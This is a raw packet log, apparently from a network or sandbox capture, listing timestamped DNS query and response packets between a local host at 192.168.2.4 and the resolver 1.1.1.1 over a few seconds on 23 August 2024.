Aug 23, 2024 18:47:43.999161959 CEST	56324	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.000149012 CEST	53	56507	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.000152111 CEST	57771	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.002085924 CEST	50468	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.005590916 CEST	58870	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.006455898 CEST	57776	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.007169962 CEST	64101	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.008037090 CEST	53121	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.009016991 CEST	56598	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.009788990 CEST	56423	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.010381937 CEST	52464	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.011153936 CEST	63165	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.011753082 CEST	63414	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.014139891 CEST	57482	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.014770985 CEST	55761	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.015391111 CEST	64870	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.015984058 CEST	62826	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.016774893 CEST	58203	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.017678022 CEST	59975	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.018395901 CEST	61073	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.019260883 CEST	59698	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.019799948 CEST	53	58367	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.022563934 CEST	53	64781	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.027420044 CEST	53	53824	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.027431965 CEST	53	59732	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.031379938 CEST	53	61998	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.031390905 CEST	53	56324	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.033946991 CEST	53	58870	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.033957958 CEST	53	50468	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.033967972 CEST	53	64101	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.033977985 CEST	53	56598	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.038348913 CEST	53	56423	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.038360119 CEST	53	63414	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.038369894 CEST	53	53121	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.041116953 CEST	53	55761	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.041127920 CEST	53	63165	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.041146040 CEST	61198	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.046195984 CEST	53	52464	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.046205997 CEST	53	64870	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.046216011 CEST	53	57482	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.046224117 CEST	53	58203	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.046233892 CEST	53	59975	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.049092054 CEST	53	59698	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.060003996 CEST	56975	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.060467958 CEST	52241	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.060549974 CEST	59628	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.060830116 CEST	50589	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.061041117 CEST	50953	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.063958883 CEST	53	57776	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.064866066 CEST	56488	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.065064907 CEST	50445	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.065272093 CEST	60258	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.065653086 CEST	63382	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.065653086 CEST	52423	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.065845013 CEST	52680	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.074814081 CEST	53	61198	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.087069035 CEST	53	53778	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.093502998 CEST	53	52241	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.093858004 CEST	53	59628	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.093868017 CEST	53	50589	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.099387884 CEST	53	60258	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.099838972 CEST	53	50445	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.099848986 CEST	53	52423	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.104453087 CEST	53	52680	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.104468107 CEST	53	56488	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.118882895 CEST	53	55561	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.121835947 CEST	53	63382	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.188319921 CEST	53	57771	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.197954893 CEST	53	62826	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.198863029 CEST	60829	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.199259043 CEST	58576	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.199601889 CEST	55708	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.199825048 CEST	58559	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.200206995 CEST	51866	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.200620890 CEST	54996	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.201368093 CEST	61492	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.202778101 CEST	60677	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.203243017 CEST	50556	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.203408957 CEST	61209	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.203697920 CEST	65508	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.205009937 CEST	59352	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.205390930 CEST	51790	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.206001043 CEST	49695	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.206231117 CEST	59029	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.206832886 CEST	60739	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:44.237602949 CEST	53	60829	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.237613916 CEST	53	61073	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.241451025 CEST	53	55708	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.241462946 CEST	53	61492	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.241472006 CEST	53	51866	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.245616913 CEST	53	58559	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.245628119 CEST	53	60677	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.248733044 CEST	53	51790	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.248744011 CEST	53	49695	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.248753071 CEST	53	50556	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.250492096 CEST	53	65508	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.250503063 CEST	53	61209	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.250511885 CEST	53	56975	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.250526905 CEST	53	50953	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.252305031 CEST	53	59029	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.260529995 CEST	53	57917	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.262521982 CEST	53	58576	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.265252113 CEST	53	54996	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.272128105 CEST	53	59352	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.429379940 CEST	53	60739	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:44.801368952 CEST	53	50832	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:46.270370007 CEST	55441	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:46.489918947 CEST	53	55441	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.304891109 CEST	53576	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.305859089 CEST	60529	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.306653023 CEST	63308	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.310770988 CEST	58837	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.311697960 CEST	58918	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.312558889 CEST	64862	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.312881947 CEST	63550	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.313781977 CEST	53438	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.313868999 CEST	56725	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.314661026 CEST	61466	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.314800978 CEST	49479	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.315795898 CEST	63712	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.316380024 CEST	52696	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.317368984 CEST	51532	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.318161964 CEST	59042	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.318479061 CEST	50549	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.319293976 CEST	51629	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.319479942 CEST	49443	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.319598913 CEST	57536	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.320473909 CEST	59472	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.320872068 CEST	57046	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.321798086 CEST	60346	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.322367907 CEST	52549	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.323297977 CEST	61479	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.323925972 CEST	65164	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.324670076 CEST	53931	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.324985027 CEST	51570	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.326898098 CEST	53278	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.327786922 CEST	63170	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.328895092 CEST	61218	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.329237938 CEST	54334	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.329687119 CEST	60378	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.329725027 CEST	63176	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.330248117 CEST	60292	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.330523968 CEST	53781	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.330625057 CEST	62062	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.331185102 CEST	57429	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.331590891 CEST	50825	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.331671953 CEST	55260	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.332353115 CEST	52700	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.332806110 CEST	52646	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.332865953 CEST	58744	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.333395958 CEST	53727	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.333802938 CEST	62927	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.333952904 CEST	61865	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.334290981 CEST	59781	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.334804058 CEST	58790	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.334922075 CEST	62363	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.335546970 CEST	56397	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.335745096 CEST	57449	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.336077929 CEST	62064	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.336649895 CEST	64280	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.337029934 CEST	63804	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.337173939 CEST	56240	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.337801933 CEST	51184	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.337858915 CEST	60941	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.338368893 CEST	56794	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.338383913 CEST	62098	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.339353085 CEST	51036	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.339840889 CEST	53920	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.340034962 CEST	60535	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.340312004 CEST	49378	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.340318918 CEST	53	60529	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.340643883 CEST	51875	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.341439009 CEST	57659	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:47.342050076 CEST	53	63308	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.346520901 CEST	53	64862	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.346535921 CEST	53	58918	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.346545935 CEST	53	49479	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.346554995 CEST	53	63550	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.346565008 CEST	53	56725	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.347894907 CEST	53	51532	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.347903967 CEST	53	52696	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.347913027 CEST	53	63712	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.347923040 CEST	53	59042	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.347933054 CEST	53	50549	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.353128910 CEST	53	51629	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.353138924 CEST	53	49443	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.353147984 CEST	53	52549	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.358262062 CEST	53	65164	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.358277082 CEST	53	51570	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.358284950 CEST	53	53576	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.358294010 CEST	53	53278	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.359030962 CEST	53	52646	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.359924078 CEST	53	60378	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.359935045 CEST	53	61218	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.359944105 CEST	53	63176	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.359952927 CEST	53	57429	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.365668058 CEST	53	60292	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.365679026 CEST	53	53781	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.366488934 CEST	53	62062	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.366498947 CEST	53	50825	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.366508007 CEST	53	52700	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.366517067 CEST	53	58744	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.366527081 CEST	53	61865	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.366538048 CEST	53	53727	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.366547108 CEST	53	58790	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.366556883 CEST	53	62927	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.366565943 CEST	53	62064	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.366575003 CEST	53	59781	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.366590023 CEST	53	57449	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.366600990 CEST	53	61466	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.366610050 CEST	53	53438	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.366619110 CEST	53	56240	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.371542931 CEST	53	64280	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.371553898 CEST	53	58837	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.371562958 CEST	53	60941	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.371572971 CEST	53	62098	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.371581078 CEST	53	51184	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.371589899 CEST	53	57536	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.371598959 CEST	53	60535	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.371608973 CEST	53	57046	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.371617079 CEST	53	57659	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.371625900 CEST	53	51875	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.377857924 CEST	53	59472	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.377880096 CEST	53	60346	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.377888918 CEST	53	53931	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.377897978 CEST	53	61479	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.384695053 CEST	53	63170	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.384726048 CEST	53	55260	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.384737968 CEST	53	54334	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.385787964 CEST	53	62363	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.390038013 CEST	53	63804	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.390053034 CEST	53	51036	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.390063047 CEST	53	56397	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.390072107 CEST	53	53920	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.390081882 CEST	53	49378	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:47.391998053 CEST	53	56794	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.681747913 CEST	57784	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.682568073 CEST	62740	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.683495998 CEST	51334	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.684355974 CEST	49747	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.685098886 CEST	62725	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.685977936 CEST	60881	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.686530113 CEST	59290	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.687277079 CEST	58851	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.688019991 CEST	52096	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.688704014 CEST	57553	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.689310074 CEST	53111	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.689846039 CEST	61937	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.690622091 CEST	58046	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.691386938 CEST	57273	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.691927910 CEST	63576	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.692579031 CEST	63625	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.693273067 CEST	61417	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.693808079 CEST	64739	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.694251060 CEST	50825	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.694616079 CEST	60931	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.694917917 CEST	54159	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.695343018 CEST	58724	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.695838928 CEST	52230	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.696180105 CEST	61449	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.696855068 CEST	51661	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.697604895 CEST	58578	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.698508978 CEST	50950	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.699282885 CEST	56561	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.699897051 CEST	53908	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.701801062 CEST	63626	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.702805042 CEST	65005	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.703695059 CEST	62671	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.704391003 CEST	50893	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.704401970 CEST	49406	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.705070972 CEST	61518	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.705096006 CEST	60583	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.705296993 CEST	55266	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.705893040 CEST	56299	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.705916882 CEST	63051	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.706132889 CEST	59268	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.706653118 CEST	56175	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.706705093 CEST	55580	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.706845999 CEST	63363	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.707401991 CEST	53917	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.707562923 CEST	62672	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.707705021 CEST	53472	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.708287001 CEST	64532	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.708472967 CEST	65511	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.708842993 CEST	54929	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.708870888 CEST	54972	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.709515095 CEST	54121	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.709573030 CEST	57769	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.709748030 CEST	50743	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.710032940 CEST	53	57784	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.710057020 CEST	52372	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.710122108 CEST	53	51334	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.710133076 CEST	53	62725	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.710475922 CEST	49456	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.712285995 CEST	64486	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.712502956 CEST	50549	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.712768078 CEST	62182	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.712949991 CEST	51032	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.713109970 CEST	53969	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.713279963 CEST	61265	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.713457108 CEST	55502	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.713558912 CEST	53	49747	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.713886976 CEST	61590	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.714263916 CEST	53038	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:48.715883970 CEST	53	52096	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.715894938 CEST	53	64739	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.717175007 CEST	53	58046	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.717185974 CEST	53	50825	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.721251965 CEST	53	52230	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.724081993 CEST	53	58578	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.724487066 CEST	53	61449	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.726404905 CEST	53	51661	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.726416111 CEST	53	50950	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.726424932 CEST	53	56561	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.726434946 CEST	53	63626	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.729675055 CEST	53	49406	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.729686022 CEST	53	60583	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.729695082 CEST	53	56175	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.729705095 CEST	53	55580	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.729716063 CEST	53	63051	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.730204105 CEST	53	62740	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.730221033 CEST	53	53917	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.730262995 CEST	53	64532	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.732884884 CEST	53	65511	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.732896090 CEST	53	54929	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.737010956 CEST	53	54972	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.738533020 CEST	53	52372	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.738543987 CEST	53	57769	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.739104033 CEST	53	50743	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.739114046 CEST	53	54121	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.739715099 CEST	53	57273	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.739726067 CEST	53	51032	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:48.739734888 CEST	53	53969	1.1.1.1	192.168.2.4
